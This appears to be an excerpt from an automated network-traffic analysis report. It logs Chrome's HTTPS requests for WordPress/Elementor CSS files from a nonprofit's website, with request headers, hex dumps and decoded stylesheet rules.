                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC889INData Raw: 37 64 63 66 0d 0a 2f 2a 2a 68 61 6e 64 6c 65 73 3a 74 68 65 6d 65 2d 73 74 79 6c 65 2c 66 6f 6e 74 2d 73 74 79 6c 65 2c 65 6c 65 6d 65 6e 74 6f 72 2d 74 68 65 6d 65 2d 73 74 79 6c 65 2c 65 6c 65 6d 65 6e 74 6f 72 2d 66 72 6f 6e 74 65 6e 64 2c 65 6c 65 6d 65 6e 74 6f 72 2d 70 72 6f 2a 2a 2f 0d 0a 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 23 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 62 67 2d 62 6c 75 65 2d 68 65 72 6f 2e 2d 2d 70 72 69 63 65 64 2d 6f 75 74 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 74 65 78 74 2d 65 64 69 74 6f 72 2c 23 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 75 73 74 6f 6d 2d 6c 69 6e 6b 73 2d 73 65 63 74 69 6f 6e 20 70 2e 66 69 72 73 74 2c 2e 62 6c 6f 67 2d 63 6f 6e 74 65 6e 74 2d 66 65 65 64 2d 73 65 63 74 69 6f 6e 20
                                                                                                                                                                                                                              Data Ascii: 7dcf/**handles:theme-style,font-style,elementor-theme-style,elementor-frontend,elementor-pro**/@charset "UTF-8";#main-container .bg-blue-hero.--priced-out .elementor-text-editor,#main-container .custom-links-section p.first,.blog-content-feed-section
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 61 69 6e 65 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 2e 67 66 6f 72 6d 5f 77 72 61 70 70 65 72 20 66 6f 72 6d 20 2e 67 66 6f 72 6d 5f 62 6f 64 79 20 2e 67 66 6f 72 6d 5f 66 69 65 6c 64 73 20 2e 67 66 69 65 6c 64 20 2e 67 69 6e 70 75 74 5f 63 6f 6e 74 61 69 6e 65 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 2e 67 66 6f 72 6d 5f 77 72 61 70 70 65 72 20 66 6f 72 6d 20 2e 67 66 6f 72 6d 5f 62 6f 64 79 20 2e 67 66 6f 72 6d 5f 66 69 65 6c 64 73 20 2e 67 66 69 65 6c 64 20 2e 67 69 6e 70 75 74 5f 63 6f 6e 74 61 69 6e 65 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 2e 67 66 6f 72 6d 5f 77 72 61 70 70 65 72 20 66 6f 72 6d 20 2e 67 66 6f 72 6d 5f 62 6f 64 79 20 2e 67 66 6f 72 6d 5f 66 69 65 6c 64 73 20 2e 67 66 69 65 6c 64
                                                                                                                                                                                                                              Data Ascii: ainer input[type=search],.gform_wrapper form .gform_body .gform_fields .gfield .ginput_container input[type=tel],.gform_wrapper form .gform_body .gform_fields .gfield .ginput_container input[type=text],.gform_wrapper form .gform_body .gform_fields .gfield
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 6e 65 72 20 2e 68 65 61 64 65 72 2d 77 72 61 70 20 23 68 65 61 64 65 72 2d 73 65 63 74 69 6f 6e 20 23 68 65 61 64 65 72 20 2e 62 6f 74 74 6f 6d 2d 72 6f 77 20 75 6c 2e 6d 65 6e 75 3e 6c 69 3e 61 2c 23 63 6f 6e 74 61 69 6e 65 72 20 2e 68 65 61 64 65 72 2d 77 72 61 70 20 23 68 65 61 64 65 72 2d 73 65 63 74 69 6f 6e 20 23 68 65 61 64 65 72 20 2e 73 65 61 72 63 68 2d 66 6f 72 6d 2d 63 6f 6e 74 61 69 6e 65 72 20 61 2e 68 65 61 64 65 72 2d 73 65 61 72 63 68 2d 6c 69 6e 6b 2d 61 6c 74 2c 23 63 6f 6e 74 61 69 6e 65 72 20 2e 68 65 61 64 65 72 2d 77 72 61 70 20 23 68 65 61 64 65 72 2d 73 65 63 74 69 6f 6e 20 23 68 65 61 64 65 72 20 2e 74 6f 70 2d 72 6f 77 20 2e 73 65 61 72 63 68 2d 74 65 78 74 2c 23 63 6f 6e 74 61 69 6e 65 72 20 2e 68 65 61 64 65 72 2d 77 72 61 70
                                                                                                                                                                                                                              Data Ascii: ner .header-wrap #header-section #header .bottom-row ul.menu>li>a,#container .header-wrap #header-section #header .search-form-container a.header-search-link-alt,#container .header-wrap #header-section #header .top-row .search-text,#container .header-wrap
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 78 2d 63 6f 6e 74 65 6e 74 20 2e 77 69 64 67 65 74 2d 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 62 6f 78 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 63 61 70 74 69 6f 6e 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 62 6f 78 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 63 61 70 74 69 6f 6e 2d 74 65 78 74 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 62 6f 78 2d 63 6f 6e 74 65 6e 74 20 62 6c 6f 63 6b 71 75 6f 74 65 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 6c 6f 63 6b 71 75 6f 74 65 5f 5f 63 6f 6e 74 65 6e 74 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 62 6f 78 2d 63 6f 6e 74 65 6e 74 20 62 6c 6f 63 6b 71 75 6f 74 65 20 70 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 69 6d 61 67 65 20 2e 65 6c 65 6d 65 6e 74 6f 72
                                                                                                                                                                                                                              Data Ascii: x-content .widget-image-caption,.elementor-icon-box-content .wp-caption,.elementor-icon-box-content .wp-caption-text,.elementor-icon-box-content blockquote .elementor-blockquote__content,.elementor-icon-box-content blockquote p,.elementor-image .elementor
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 77 69 64 67 65 74 2d 61 63 63 6f 72 64 69 6f 6e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 61 63 63 6f 72 64 69 6f 6e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 61 63 63 6f 72 64 69 6f 6e 2d 69 74 65 6d 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 74 61 62 2d 74 69 74 6c 65 20 62 75 74 74 6f 6e 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 61 63 63 6f 72 64 69 6f 6e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 61 63 63 6f 72 64 69 6f 6e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 61 63 63 6f 72 64 69 6f 6e 2d 69 74 65 6d 20 2e 75 69 2d 61 63 63 6f 72 64 69 6f 6e 2d 68 65 61 64 65 72 20 61 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 61 63 63 6f 72 64 69 6f 6e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 61 63 63 6f 72 64 69 6f 6e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 61 63 63 6f 72
                                                                                                                                                                                                                              Data Ascii: widget-accordion .elementor-accordion .elementor-accordion-item .elementor-tab-title button,.elementor-widget-accordion .elementor-accordion .elementor-accordion-item .ui-accordion-header a,.elementor-widget-accordion .elementor-accordion .elementor-accor
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 2d 61 63 63 6f 72 64 69 6f 6e 2d 68 65 61 64 65 72 20 61 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 61 63 63 6f 72 64 69 6f 6e 20 2e 73 70 62 5f 61 63 63 6f 72 64 69 6f 6e 5f 77 72 61 70 70 65 72 20 2e 73 70 62 5f 61 63 63 6f 72 64 69 6f 6e 5f 73 65 63 74 69 6f 6e 20 2e 75 69 2d 61 63 63 6f 72 64 69 6f 6e 2d 68 65 61 64 65 72 20 62 75 74 74 6f 6e 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 62 6c 6f 63 6b 71 75 6f 74 65 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 6c 6f 63 6b 71 75 6f 74 65 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 6c 6f 63 6b 71 75 6f 74 65 5f 5f 63 6f 6e 74 65 6e 74 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 62 6c 6f 63 6b 71 75 6f 74 65 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 6c 6f 63 6b 71 75 6f 74 65 20
                                                                                                                                                                                                                              Data Ascii: -accordion-header a,.elementor-widget-accordion .spb_accordion_wrapper .spb_accordion_section .ui-accordion-header button,.elementor-widget-blockquote .elementor-blockquote .elementor-blockquote__content,.elementor-widget-blockquote .elementor-blockquote
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 75 6e 74 64 6f 77 6e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 75 6e 74 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 75 6e 74 65 72 2d 6e 75 6d 62 65 72 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 75 6e 74 64 6f 77 6e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 75 6e 74 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 75 6e 74 65 72 2d 6e 75 6d 62 65 72 2d 70 72 65 66 69 78 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 75 6e 74 64 6f 77 6e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e
                                                                                                                                                                                                                              Data Ascii: tor-widget-countdown .elementor-widget-container .elementor-counter .elementor-counter-number,.elementor-widget-countdown .elementor-widget-container .elementor-counter .elementor-counter-number-prefix,.elementor-widget-countdown .elementor-widget-contain
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 2d 63 6f 75 6e 74 65 72 2d 6e 75 6d 62 65 72 2d 70 72 65 66 69 78 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 75 6e 74 64 6f 77 6e 20 2e 73 70 62 2d 61 73 73 65 74 2d 63 6f 6e 74 65 6e 74 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 75 6e 74 64 6f 77 6e 2d 77 72 61 70 70 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 75 6e 74 65 72 2d 6e 75 6d 62 65 72 2d 73 75 66 66 69 78 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 75 6e 74 64 6f 77 6e 20 2e 73 70 62 2d 61 73 73 65 74 2d 63 6f 6e 74 65 6e 74 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 75 6e 74 64 6f 77 6e 2d 77 72 61 70 70 65 72 20 64 69 76 2e 63 6f 75 6e 74 2d 73 75 62 6a 65 63 74 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 75 6e 74 64 6f 77 6e 20 2e
                                                                                                                                                                                                                              Data Ascii: -counter-number-prefix,.elementor-widget-countdown .spb-asset-content .elementor-countdown-wrapper .elementor-counter-number-suffix,.elementor-widget-countdown .spb-asset-content .elementor-countdown-wrapper div.count-subject,.elementor-widget-countdown .
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 63 6f 75 6e 74 64 6f 77 6e 2d 77 72 61 70 70 65 72 20 2e 63 6f 75 6e 74 2d 6e 75 6d 62 65 72 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 75 6e 74 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 75 6e 74 64 6f 77 6e 2d 77 72 61 70 70 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 75 6e 74 64 6f 77 6e 2d 64 69 67 69 74 73 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 75 6e 74 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 75 6e 74 64 6f 77 6e 2d 77 72 61 70 70 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 75 6e 74 65 72 2d 6e 75 6d 62 65 72 2c 2e 65 6c
                                                                                                                                                                                                                              Data Ascii: countdown-wrapper .count-number,.elementor-widget-counter .elementor-widget-container .elementor-countdown-wrapper .elementor-countdown-digits,.elementor-widget-counter .elementor-widget-container .elementor-countdown-wrapper .elementor-counter-number,.el
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 69 64 67 65 74 2d 63 6f 75 6e 74 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 66 2d 63 6f 75 6e 74 2d 61 73 73 65 74 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 75 6e 74 65 72 2d 6e 75 6d 62 65 72 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 75 6e 74 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 66 2d 63 6f 75 6e 74 2d 61 73 73 65 74 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 75 6e 74 65 72 2d 6e 75 6d 62 65 72 2d 70 72 65 66 69 78 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 75 6e 74 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 66 2d 63 6f 75 6e 74 2d 61 73 73 65
                                                                                                                                                                                                                              Data Ascii: idget-counter .elementor-widget-container .sf-count-asset .elementor-counter-number,.elementor-widget-counter .elementor-widget-container .sf-count-asset .elementor-counter-number-prefix,.elementor-widget-counter .elementor-widget-container .sf-count-asse


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              10192.168.2.649730141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:00 UTC570OUTGET /wp-content/uploads/elementor/css/post-7.css HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC478INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:01 GMT
                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Wed, 16 Oct 2024 15:32:16 GMT
                                                                                                                                                                                                                              ETag: W/"670fdc80-593a"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 575045
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5aa4f486c62-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC891INData Raw: 35 39 33 61 0d 0a 2e 65 6c 65 6d 65 6e 74 6f 72 2d 37 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 36 63 34 36 36 34 35 3a 6e 6f 74 28 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6d 6f 74 69 6f 6e 2d 65 66 66 65 63 74 73 2d 65 6c 65 6d 65 6e 74 2d 74 79 70 65 2d 62 61 63 6b 67 72 6f 75 6e 64 29 2c 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 37 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 36 63 34 36 36 34 35 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6d 6f 74 69 6f 6e 2d 65 66 66 65 63 74 73 2d 63 6f 6e 74 61 69 6e 65 72 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6d 6f 74 69 6f 6e 2d 65 66 66 65 63 74 73 2d 6c 61 79 65 72 7b 62 61 63 6b 67
                                                                                                                                                                                                                              Data Ascii: 593a.elementor-7 .elementor-element.elementor-element-6c46645:not(.elementor-motion-effects-element-type-background), .elementor-7 .elementor-element.elementor-element-6c46645 > .elementor-motion-effects-container > .elementor-motion-effects-layer{backg
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 6d 65 6e 74 2d 66 33 39 32 33 30 38 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 70 61 64 64 69 6e 67 3a 30 70 78 20 30 70 78 20 30 70 78 20 30 70 78 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 37 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 66 33 39 32 33 30 38 7b 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 37 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 62 37 38 36 39 61 30 7b 2d 2d 73 70 61 63 65 72 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 37 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d
                                                                                                                                                                                                                              Data Ascii: ment-f392308 > .elementor-widget-container{padding:0px 0px 0px 0px;}.elementor-7 .elementor-element.elementor-element-f392308{color:#FFFFFF;}.elementor-7 .elementor-element.elementor-element-b7869a0{--spacer-size:16px;}.elementor-7 .elementor-element.elem
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 6c 65 6d 65 6e 74 6f 72 2d 37 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 35 33 38 34 34 38 37 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 70 78 20 30 70 78 20 30 70 78 20 30 70 78 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 30 70 78 20 30 70 78 20 30 70 78 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 37 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 35 33 38 34 34 38 37 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 7b 2d 2d 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 3b 2d 2d 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 2d 2d 66 6c 65 78 2d
                                                                                                                                                                                                                              Data Ascii: lementor-7 .elementor-element.elementor-element-5384487 > .elementor-widget-container{margin:0px 0px 0px 0px;padding:0px 0px 0px 0px;}.elementor-7 .elementor-element.elementor-element-5384487.elementor-element{--align-self:flex-start;--flex-grow:1;--flex-
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 6f 77 3a 30 3b 2d 2d 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 37 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 32 64 36 30 34 33 30 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 68 65 61 64 69 6e 67 2d 74 69 74 6c 65 7b 63 6f 6c 6f 72 3a 23 30 30 37 46 41 39 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4c 6f 72 61 22 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 31 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 38 70 78 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 37 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 37 38 37 39 34 64
                                                                                                                                                                                                                              Data Ascii: ow:0;--flex-shrink:0;}.elementor-7 .elementor-element.elementor-element-2d60430 .elementor-heading-title{color:#007FA9;font-family:"Lora", Sans-serif;font-size:21px;font-weight:700;line-height:28px;}.elementor-7 .elementor-element.elementor-element-78794d
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 37 36 34 64 38 61 31 2e 65 2d 63 6f 6e 7b 2d 2d 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 37 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 63 33 37 32 36 39 38 7b 77 69 64 74 68 3a 76 61 72 28 20 2d 2d 63 6f 6e 74 61 69 6e 65 72 2d 77 69 64 67 65 74 2d 77 69 64 74 68 2c 20 31 30 30 25 20 29 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 2d 2d 63 6f 6e 74 61 69 6e 65 72 2d 77 69 64 67 65 74 2d 77 69 64 74 68 3a 31 30 30 25 3b 2d 2d 63 6f 6e 74 61 69 6e 65 72 2d 77 69 64 67 65 74 2d 66 6c 65 78 2d 67 72 6f 77 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 7d
                                                                                                                                                                                                                              Data Ascii: nt.elementor-element-764d8a1.e-con{--align-self:flex-start;}.elementor-7 .elementor-element.elementor-element-c372698{width:var( --container-widget-width, 100% );max-width:100%;--container-widget-width:100%;--container-widget-flex-grow:0;text-align:left;}
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 30 61 34 37 32 61 65 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 77 72 61 70 70 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 37 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 64 31 66 30 62 38 35 7b 2d 2d 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 2d 2d 63 6f 6e 74 61 69 6e 65 72 2d 77 69 64 67 65 74 2d 77 69 64 74 68 3a 63 61 6c 63 28 20 28 20 31 20 2d 20 76 61 72 28 20 2d 2d 63 6f 6e 74 61 69 6e 65 72 2d 77 69 64 67 65 74 2d 66 6c 65 78 2d 67 72 6f 77 20 29 20 29 20 2a 20 31 30 30 25 20 29 3b 2d
                                                                                                                                                                                                                              Data Ascii: ement.elementor-element-0a472ae .elementor-icon-wrapper{text-align:left;}.elementor-7 .elementor-element.elementor-element-d1f0b85{--display:flex;--flex-direction:column;--container-widget-width:calc( ( 1 - var( --container-widget-flex-grow ) ) * 100% );-
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 34 64 65 36 33 33 61 7b 63 6f 6c 6f 72 3a 23 33 39 33 39 33 39 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 49 42 4d 20 50 6c 65 78 20 53 61 6e 73 22 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 30 70 78 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 37 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 38 63 34 61 39 33 31 7b 2d 2d 73 70 61 63 65 72 2d 73 69 7a 65 3a 33 30 70 78 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 37 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74
                                                                                                                                                                                                                              Data Ascii: lement.elementor-element-4de633a{color:#393939;font-family:"IBM Plex Sans", Sans-serif;font-size:16px;font-weight:400;letter-spacing:0px;}.elementor-7 .elementor-element.elementor-element-8c4a931{--spacer-size:30px;}.elementor-7 .elementor-element.element
